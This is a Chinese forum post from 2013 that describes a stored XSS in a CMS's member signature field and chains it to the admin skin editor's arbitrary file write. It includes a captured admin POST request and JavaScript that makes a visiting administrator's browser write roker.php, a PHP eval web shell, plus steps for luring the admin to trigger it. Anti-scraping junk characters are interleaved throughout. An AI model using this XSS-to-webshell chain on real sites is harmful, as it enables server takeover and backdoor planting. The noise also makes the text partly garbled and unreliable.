|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题4 T2 q! j1 V; f P7 j
官网已经修补了,所以重新下了源码
6 S$ Z0 b0 p. {; S: A因为 后台登入 还需要认证码 所以 注入就没看了。$ F" H- R' h/ z/ A, D1 r
存在 xss- x# i" F j7 w% S/ l6 v( N
漏洞文件 user/member/skin_edit.php
1 Z* F" \; ~. k& e本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
: w& j0 _. A1 F c# c' Y" u0 F; {" V 9 W6 C$ R) d; S& d1 u
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>: Q7 F" v% C A0 T3 C
: G& B. Y2 c# a2 [* Z</textarea></td></tr>
1 ], e" L+ z+ s& X5 Z! E & l: t$ N5 {' g$ F/ d
user/do.php
" g I! n" s6 P0 | V; |
6 Q- {$ X; G* m9 s; \( H
1 o! L! h5 x, q4 a& qif($op=='zl'){ //资料
8 k" _" b5 G& ~, | # g* H# t7 A1 n9 Z1 o
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
' L7 [; m8 }- @& ^1 c exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));5 Z% y3 E. D+ l3 ]
. n( Y: f; @3 {* ?5 c $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
# T9 ~1 z5 z8 u: A+ j
! w* s6 U1 H }3 {' g CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
; d7 I+ L5 `6 d8 k where CS_Name='".$cscms_name."'";% {* y2 [4 A3 Y3 k7 m
0 b* ` Q8 _: h) k( u5 P
if($db->query($sql)){ O: z& M) P8 k% V8 r
: ~. q' S4 p) i exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));5 E; v1 C' t: l' w3 P
/ g3 x/ w; u3 p6 x) b" P
}else{* f2 I2 M8 v" I& C v F0 k
7 x+ D; H7 r4 U4 D1 k$ w
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
4 n9 E3 e. u; x; d* C Y+ @. B
- s$ C$ ~0 m v: a' P }8 w4 y# ~' C5 C& d& J8 D2 k3 O
1 d" P- c, [! S! F( G; `& G, P1 z1 q
没有 过滤导致xss产生。
|9 V- g) B* O后台 看了下 很奇葩的是可以写任意格式文件。。
+ C: y" U3 l5 D; w, p% @; q+ f抓包。。
* w" y' k# Q7 A# H& }! m# k8 B' D4 V2 [1 F$ R
9 G* b5 S; ]( @7 M- ^5 O7 c% ~: L
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
, i% F% r1 n; _
, ?, b1 ^; p$ m, R. U M& ?6 JAccept: text/html, application/xhtml+xml, */*% Q% l8 B- n1 i: H/ @
$ G9 v+ Z- ^) K/ |
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php, C* ~$ l3 B) ?! P" o
" L v0 j, o( ~8 i* ?4 R
Accept-Language: zh-CN
: O* N* `3 ~+ @" V$ V1 a6 H k3 S- ^9 Z7 `) t* t- R- g! A
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
/ x* M) l' @ V0 m) Z2 d3 w# @7 \6 l 8 S% f6 |$ R9 ~) D; A
Content-Type: application/x-www-form-urlencoded: n' ?, d0 |* l L$ v9 x2 u
4 i" g9 W6 E( g
Accept-Encoding: gzip, deflate. ~ C3 Z0 F. Z) c/ B+ i
. W @7 x2 W/ W5 R' n
Host: 127.0.0.1
3 p; f. c7 m$ h5 ~5 U1 ]. O 4 {* z' V& F3 Y' x) ^) P& ~1 D
Content-Length: 38
F% [8 M9 Z2 O9 ~0 x
/ n f9 Z+ \0 _# e" a% T- IDNT: 1
* I5 K& a& l0 Y0 { : a5 S7 u: `7 \5 F- y t8 K# K
Connection: Keep-Alive
! l4 ~( h/ K X7 f+ Z# }
) M) ^! A4 N0 UCache-Control: no-cache% U; x' t4 D8 I+ c! ]6 ?, a
" h. H% {' e% J# }% g
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594 z+ Q; c$ f3 b6 p* s: t
- x) S. m; m; l& _& Z8 B x' j
! Q! a+ o7 w$ o$ w" Y
name=aaa.php&content=%3Cs%3E%3Ca%25%3E
0 S0 _- K; ~& [! z7 Y; ^- D6 f. }, I% ~
. E# p( s3 F# P- ^- @4 i; S* {/ L' r4 ]5 ~8 z$ L# Y: R) D2 x6 Z, W
于是 构造js如下。
: `% I3 U8 @; O( q, v) n1 e: [9 R x4 h2 o9 O
本帖隐藏的内容<script> 6 j! \/ v$ B. g$ @$ G
thisTHost = top.location.hostname;: q" h( f& q- T' j
, J( I' c# L3 f; z3 u( y/ P
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
' Z/ r6 u4 t5 m+ {. J! {2 l0 y6 {
8 j8 A9 z- h0 w% M V/ w3 }/ }function PostSubmit(url, data, msg) {
8 g6 e$ w' ~4 E2 ?$ y var postUrl = url;" f) v+ Y" |2 a; z
+ O4 J" [5 X6 }4 X, B% {7 D: G
var postData = data;
@8 P* r5 |( V var msgData = msg;
% i! u' E: q& K) D) G( {- E var ExportForm = document.createElement("FORM");
; k! K% c; \$ G8 P+ `' m document.body.appendChild(ExportForm);
6 o6 A& [- Y, o ExportForm.method = "POST"; - [8 _3 _% [7 L+ U: B$ y5 ]5 F. `
var newElement = document.createElement("input");
4 p6 p5 f! T2 z4 I+ v newElement.setAttribute("name", "name"); - u3 w* @/ W6 @$ ?7 I
newElement.setAttribute("type", "hidden");
0 v# D2 w3 ]8 z9 ?" F4 ^+ m var newElement2 = document.createElement("input");
~, Q% c' ]1 t- S newElement2.setAttribute("name", "content");
8 J( B- A6 f; J newElement2.setAttribute("type", "hidden"); % M K+ |# B, V
ExportForm.appendChild(newElement);
( P, p: K0 Q% x7 O' a/ N5 b" g ExportForm.appendChild(newElement2);
* k6 s6 |' A3 P4 \" e* x" N newElement.value = postData; , B' I5 D* L. Y4 Y! L
newElement2.value = msgData;
$ G, n1 A& i0 B9 l( |4 l3 E2 B. T ExportForm.action = postUrl; 3 A8 E) k7 T% I- U, d
ExportForm.submit();
* j: b# p! d. B2 W! |};
* ^0 f2 ~$ u( z8 b
0 E; {8 s {1 w0 _+ q% P2 cPostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
. t1 c2 v* m, A# ?
, p. `, I) ]" e2 j' }& l8 C5 X5 Q</script>$ ^4 V3 |2 z; J( U1 M6 ~5 z6 m
% C1 K3 B5 c6 s. B0 Q: E7 ]
7 ~# i. w3 I- Q7 ] }5 R
' D+ k6 L' t; C. r/ s5 e
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
7 Y! \5 f9 _; I. G# p. y$ M用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)
( l) s* F& L/ t* c就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
/ i r# L5 ~1 T7 {! b9 l) _$ d |
|
发表于 2013-11-6 18:09:37
收藏
支持
反对